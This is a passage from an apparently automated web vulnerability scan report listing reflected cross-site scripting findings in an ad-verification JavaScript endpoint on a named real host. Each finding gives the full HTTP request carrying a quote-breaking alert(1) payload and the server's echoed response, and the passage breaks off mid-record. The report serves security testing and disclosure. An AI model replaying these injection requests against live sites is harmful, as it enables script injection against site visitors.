   jsref : "http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc72461"-alert(1)-"68fd0dd1600/10736/179733/adj/N5823.8705.MLB/B5918949.10;sz=160x600;ord=6927014",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases
...[SNIP]...

2.53. http://fw.adsafeprotected.com/rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e8e4"-alert(1)-"66c74cdde76 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/dc/107361e8e4"-alert(1)-"66c74cdde76/179733/adj/N5823.8705.MLB/B5918949.10;sz=160x600;ord=6927014? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B49B44617777455C1C06DF0D1A12D42A; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:25 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/107361e8e4"-alert(1)-"66c74cdde76/179733/adj/N5823.8705.MLB/B5918949.10;sz=160x600;ord=6927014",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "true",
   phoneHomeDelay : "3000",
   killPhrases : "",

...[SNIP]...

2.54. http://fw.adsafeprotected.com/rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae470"-alert(1)-"6c0de5df76c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/dc/10736/179733ae470"-alert(1)-"6c0de5df76c/adj/N5823.8705.MLB/B5918949.10;sz=160x600;ord=6927014? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=117F352BB6F22F325C438328E8790655; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:26 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10736/179733ae470"-alert(1)-"6c0de5df76c/adj/N5823.8705.MLB/B5918949.10;sz=160x600;ord=6927014",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid
...[SNIP]...

2.55. http://fw.adsafeprotected.com/rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd9d6"-alert(1)-"2b09f5fcdaa was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/dc/10736/179733/adjfd9d6"-alert(1)-"2b09f5fcdaa/N5823.8705.MLB/B5918949.10;sz=160x600;ord=6927014? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9F7C04BA304238499B9F7B8E8EBE8D90; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:26 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10736/179733/adjfd9d6"-alert(1)-"2b09f5fcdaa/N5823.8705.MLB/B5918949.10;sz=160x600;ord=6927014",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "true",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gt
...[SNIP]...

2.56. http://fw.adsafeprotected.com/rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd555"-alert(1)-"ab026152e04 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/dc/10736/179733/adj/N5823.8705.MLBbd555"-alert(1)-"ab026152e04/B5918949.10;sz=160x600;ord=6927014? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B14D2E67FEF476D1EC90A153ECC57EEE; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:26 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10736/179733/adj/N5823.8705.MLBbd555"-alert(1)-"ab026152e04/B5918949.10;sz=160x600;ord=6927014",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gtt0ekac"
};


(
...[SNIP]...

2.57. http://fw.adsafeprotected.com/rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50477"-alert(1)-"b76bea173ee was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.1050477"-alert(1)-"b76bea173ee;sz=160x600;ord=6927014? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:26 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10736/179733/adj/N5823.8705.MLB/B5918949.1050477"-alert(1)-"b76bea173ee;sz=160x600;ord=6927014",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gtt0ekj7"
};


(function(){v
...[SNIP]...

2.58. http://fw.adsafeprotected.com/rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7cd1"-alert(1)-"02a8dfc6b5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10;sz=160x600;ord=6927014?&c7cd1"-alert(1)-"02a8dfc6b5d=1 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:25 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10;sz=160x600;ord=6927014?&c7cd1"-alert(1)-"02a8dfc6b5d=1",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "true",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gtt0ejjt"
};


(function(){var O="3.13.1";var w=(a
...[SNIP]...

2.59. http://fw.adsafeprotected.com/rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72171"-alert(1)-"9f07e37a40c was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10;sz=160x600;ord=6927014?72171"-alert(1)-"9f07e37a40c HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BAADF1FD513A8859D5F71410BF463A8E; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:24 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10;sz=160x600;ord=6927014?72171"-alert(1)-"9f07e37a40c",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "true",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gtt0ejam"
};


(function(){var O="3.13.1";var w=(ads
...[SNIP]...

2.60. http://fw.adsafeprotected.com/rjss/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc1ae"-alert(1)-"39b95d62acf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/dcfc1ae"-alert(1)-"39b95d62acf/10736/179745/adj/N5823.8705.MLB/B5918949.6;sz=160x600;ord=2586041? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=7570417714305222
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=082AB5E86F802B239B6BA532292C7307

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7C193E6F798A746064411D8999587B87; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:29:54 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=7570417714305222",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dcfc1ae"-alert(1)-"39b95d62acf/10736/179745/adj/N5823.8705.MLB/B5918949.6;sz=160x600;ord=2586041",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases
...[SNIP]...

2.61. http://fw.adsafeprotected.com/rjss/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5031b"-alert(1)-"8b7f10a80f2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/dc/107365031b"-alert(1)-"8b7f10a80f2/179745/adj/N5823.8705.MLB/B5918949.6;sz=160x600;ord=2586041? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=7570417714305222
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=082AB5E86F802B239B6BA532292C7307

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C8F90D3D9D425816F6F2F03FEC4721F4; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:29:55 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=7570417714305222",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/107365031b"-alert(1)-"8b7f10a80f2/179745/adj/N5823.8705.MLB/B5918949.6;sz=160x600;ord=2586041",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",

...[SNIP]...

2.62. http://fw.adsafeprotected.com/rjss/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c89ac"-alert(1)-"6db55c26a96 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/dc/10736/179745c89ac"-alert(1)-"6db55c26a96/adj/N5823.8705.MLB/B5918949.6;sz=160x600;ord=2586041? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=7570417714305222
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=082AB5E86F802B239B6BA532292C7307

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:29:55 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=7570417714305222",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10736/179745c89ac"-alert(1)-"6db55c26a96/adj/N5823.8705.MLB/B5918949.6;sz=160x600;ord=2586041",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "true",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid :
...[SNIP]...

2.63. http://fw.adsafeprotected.com/rjss/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a15b"-alert(1)-"00b71c3e276 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/dc/10736/179745/adj5a15b"-alert(1)-"00b71c3e276/N5823.8705.MLB/B5918949.6;sz=160x600;ord=2586041? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=7570417714305222
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=082AB5E86F802B239B6BA532292C7307

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1E2D4D1CDEAB68B1AFC99FA3CC8CC3E1; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:29:55 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=7570417714305222",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10736/179745/adj5a15b"-alert(1)-"00b71c3e276/N5823.8705.MLB/B5918949.6;sz=160x600;ord=2586041",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gt
...[SNIP]...

2.64. http://fw.adsafeprotected.com/rjss/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d151e"-alert(1)-"833af767b5c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/dc/10736/179745/adj/N5823.8705.MLBd151e"-alert(1)-"833af767b5c/B5918949.6;sz=160x600;ord=2586041? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=7570417714305222
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=082AB5E86F802B239B6BA532292C7307

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3175190625F12185FABFF4B5E43E5A9C; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:29:55 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=7570417714305222",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10736/179745/adj/N5823.8705.MLBd151e"-alert(1)-"833af767b5c/B5918949.6;sz=160x600;ord=2586041",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gtt0yh34"
};


(f
...[SNIP]...

2.65. http://fw.adsafeprotected.com/rjss/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16677"-alert(1)-"52a76ba1058 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/dc/10736/179745/adj/N5823.8705.MLB/B5918949.616677"-alert(1)-"52a76ba1058;sz=160x600;ord=2586041? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=7570417714305222
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=082AB5E86F802B239B6BA532292C7307

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C087BA4B3BC137D761B99AAB267FBF36; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:29:56 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=7570417714305222",
